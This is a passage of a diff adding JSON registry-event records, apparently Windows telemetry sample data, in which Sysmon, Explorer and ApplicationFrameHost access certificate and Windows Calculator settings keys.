"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", + "registry_value": "SplashScreen", + "timestamp": 131883573248080000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248230000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573248230000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", + "registry_value": "PreferredMinSize", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + 